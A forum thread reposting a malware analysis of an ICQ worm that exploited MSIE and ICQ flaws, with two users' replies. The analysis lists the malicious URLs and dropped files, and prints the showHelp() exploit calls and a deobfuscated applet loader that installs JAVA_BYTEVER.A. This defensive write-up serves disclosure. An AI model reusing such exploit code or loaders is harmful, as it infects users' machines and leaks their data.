ICQ Worm!


Status
Not open for further replies.
#1
Extracted from: http://www.daemonology.net/ICQworm/worm.txt

WARNING: DO NOT CLICK ON THE LINKS WITHOUT FINISHING READTING THROUGH THIS ARTICLE!!!

Summary: A worm is spreading via ICQ, using a flaw in MSIE and a
misconfiguration in ICQ itself. As a side effect (or, quite likely,
the intended purpose), it installs JAVA_BYTEVER.A (or some variant thereof).

The following page contains malware: http://www.jokeworld.biz/index.html
It does the following:
1. Opens up http://www.joecartoon.com/pages/cartoons/ to give the user
something to watch.

2. Opens up http://www.jokeworld.biz/meine.scm, using the ICQ flaw
described at
http://archives.neohapsis.com/archives/bugtraq/2002-07/0182.html
to execute it.

2.1. If ICQ is currently running, the following files will be created:
c:\program files\ICQ\sounds\meine\ChatAction.wav (1088kb of zero bytes)
c:\program files\ICQ\sounds\meine\ChatEmote.wav (empty)
c:\program files\ICQ\sounds\meine\FileDone.wav (513kb of zero bytes)
c:\program files\ICQ\sounds\meine\WebSearch.wav (empty)
c:\program files\ICQ\sounds\meine\Startup.wav (compiled html file, exploit
code)

3. Uses the exploit described at
http://www.securitytracker.com/alerts/2003/Dec/1008578.html
to execute the exploit code using the compiled help viewer:
showHelp("mk:mad:MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\ICQ\\Sounds\\meine[1]\\Startup.wav::/ie****er.html");
showHelp("mk:mad:MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\ICQ\\Sounds\\meine\\Startup.wav::/ie****er.html");

3.1. Microsoft's chm format is insufficiently documented for me to get any
further than this without an airgapped system, but I assume it modifies
ICQ's startup procedure to cause the observed symptom of sending
"http://www.jokeworld.biz/index.html :)) LOL" to all contacts at startup.

4. Opens up http://www.sx2group.com/user_bx.html, which after deobfuscating
runs the following code:
<HTML><HEAD>
<script>
<applet width=1 height=1 ARCHIVE=nocheat.jar code=Counter>;
<param name='ac' value='BX'>;
<param name='ua' value='"+navigator.userAgent+"'>;
<param name='pl' value='"+navigator.platform+"'>;
</applet>;
</BODY></HTML>

4.1. nocheat.jar is detected by PC-cillin as JAVA_BYTEVER.A.

Thanks to: Wampus, for getting infected and thereby informing me of this. :)

Colin Percival
cperciva@daemonology.net
 

justarius

Senior Member
Nov 9, 2003
1,226
0
36
Northeast
Visit site
#2
Oh, so it IS a worm! I was quite surprised when I received the exact same message from two different contacts in my ICQ at the same time. I clicked on the link, but closed it before it loaded cos I thought it a bit weird. Hmm.. guess I should have to run a virus scan... ;(
 

phrozact

New Member
Jul 14, 2003
105
0
0
Visit site
#6
What if I'm using a non-ICQ program like Trillian or Miranda? Will I still be infected and send out those LOL msgs?
I think I clicked on the link, but when my firewall prog warned me abt something related to ICQ, I denied access...I hope.
 

Status
Not open for further replies.
Top Bottom